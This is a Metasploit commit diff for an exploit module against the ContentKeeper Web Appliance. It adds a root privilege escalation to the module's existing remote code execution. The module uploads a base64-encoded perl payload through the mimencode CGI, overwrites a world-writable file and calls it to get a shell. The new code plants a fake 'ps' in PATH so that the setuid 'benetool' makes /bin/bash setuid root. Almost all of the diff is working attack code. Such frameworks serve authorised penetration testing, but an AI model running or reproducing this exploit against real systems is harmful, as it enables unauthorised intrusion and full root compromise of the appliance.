Added privilege escalation to contentkeeperweb_mimencode exploit module.

git-svn-id: file:///home/svn/framework3/trunk@12265 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/unix/http/contentkeeperweb_mimencode.rb

@@ -22,9 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'  => %q{
 					This module exploits the ContentKeeper Web Appliance. Versions prior
 				to 125.10 are affected. This module exploits a combination of weaknesses
-				to enable remote command execution as the Apache user. Following exploitation
-				it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
-				to escalate to root.
+				to enable remote command execution as the Apache user. By setting
+				SkipEscalation to false, this module will attempt to setuid the bash shell.
 			},
 			'Author' 	   => [ 'patrick' ],
 			'Arch'		   => [ ARCH_CMD ],
@@ -32,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'      => '$Revision$',
 			'References'   =>
 				[
-					[ 'OSVDB', '54551'],
-					[ 'OSVDB', '54552'],
+					[ 'OSVDB', '54551' ],
+					[ 'OSVDB', '54552' ],
 					[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
 				],
 			'Privileged'	=> false,
@@ -44,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic perl ruby telnet',
+							'RequiredCmd' => 'generic perl telnet',
 						}
 				},
 			'Platform'     => ['unix'],
@@ -58,6 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				Opt::RPORT(80),
+				OptString.new('OVERWRITE', [ true,  "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
+				OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
 			],self.class)
 	end
 
@@ -77,31 +78,48 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		exp = "#!/usr/bin/perl\n"
 		exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
-		exp << "system(\""
-		exp << payload.encoded.gsub('"', '\"')
-		exp << "\");\n"
+		exp << "use IO::Socket::INET;\n"
+
+		if (datastore['PAYLOAD'] =~ /perl/)
+			if not datastore['SkipEscalation']
+				print_status("Attempting to facilitate root escalation...")
+				exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
+			end
+			exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
+		else
+			exp << "system(\""
+			exp << payload.encoded.gsub('"', '\"')
+			exp << "\");\n"
+		end
 
 		body = Rex::Text.encode_base64(exp)
 
 		connect
 
-		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
+		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
 		sploit << "Host: #{datastore['RHOST']}\r\n"
 		sploit << "Content-Length: #{body.length}\r\n\r\n"
 
-		print_status("Uploading payload to target.")
+		print_status("Uploading payload to target...")
 		sock.put(sploit + body + "\r\n\r\n")
 		disconnect
 
-		select(nil,nil,nil,5)
+		select(nil,nil,nil,3) # Wait a few seconds..
 		print_status("Calling payload...")
 		connect
-		req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
+		req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
 		req << "Host: #{datastore['RHOST']}\r\n"
 		sock.put(req + "\r\n\r\n")
 
-		handler
+		handler	
 		disconnect
+		select(nil,nil,nil,3) # Wait for session creation.
+		if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/
+			print_status("Privilege escalation appears to have worked!")
+			print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
+			print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
+		end
+
 	end
 end